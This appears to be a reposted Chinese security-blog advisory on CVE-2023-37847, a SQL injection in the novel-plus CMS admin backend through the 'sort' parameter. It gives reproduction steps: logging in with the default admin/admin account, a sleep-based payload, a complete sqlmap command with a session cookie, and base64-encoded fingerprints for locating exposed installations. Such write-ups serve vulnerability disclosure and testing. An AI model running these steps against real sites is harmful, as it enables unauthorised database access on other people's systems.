CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程

admin 2023年8月21日00:54:44评论113 views字数 1027阅读3分25秒阅读模式

简介

novel-plus 是一个多端(PC、WAP)阅读,功能完善的原创文学 CMS 系统。由前台门户系统、作家后台管理系统、平台后台管理系统和爬虫管理系统等多个子系统构成,包括小说推荐、作品检索、小说排行、小说阅读、小说评论、会员中心、作家专区等功能,支持自定义多模版、可拓展的多种小说内容存储方式(内置数据库分表存储和 TXT 文本存储)、阅读主题切换、多爬虫源自动采集和更新数据、会员充值、订阅模式、新闻发布和实时统计报表。
漏洞描述

novel-plus 3.6.2版本存在SQL注入漏洞,该漏洞源于文件/common/dict/list?sort=sleep(1)&limit=8&offset=1存在问题,对参数sort的操作会导致sql注入。攻击者可利用该漏洞执行非法SQL命令。
影响版本

novel-plus ≤ 3.6.2
漏洞复现

漏洞路由:/common/dict/list

漏洞参数:sort

1.默认账户密码“admin/admin”登录后台,获取管理员cookie

CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程

2.sqlmap命令

python3 sqlmap.py -u "http://xxx.xxx.xxx/common/dict/list?sort=1&limit=10&offset=0&type=" --cookie "JSESSIONID=b8f26ee3-4f75-4086-8c61-2bfe4ab47a77" -p "sort" --level 5

CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-37847https://github.com/KingBangQ/CVE-2023-37847/blob/main/README.mdhttps://github.com/201206030/novel-plu
base64
前台
Ym9keT0i5bCP6K+057K+5ZOB5bGLLOWwj+ivtCzlsI/or7RDTVMs5Y6f5Yib5paH5a2m57O757ufLOW8gOa6kOWwj+ivtOezu+e7nyzlhY3otLnlsI/or7Tlu7rnq5nnqIvluo8i

后台
Ym9keT0iPGgxPuWwj+ivtOeyvuWTgeWxi+WQjuWPsOeZu+W9lTwvaDE+Ig==

原文始发于微信公众号(不够安全):CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月21日00:54:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-37847:novel-plus(小说精品屋-plus)CMS后台SQL注入 附复现过程https://cn-sec.com/archives/1956335.html

发表评论

匿名网友 填写信息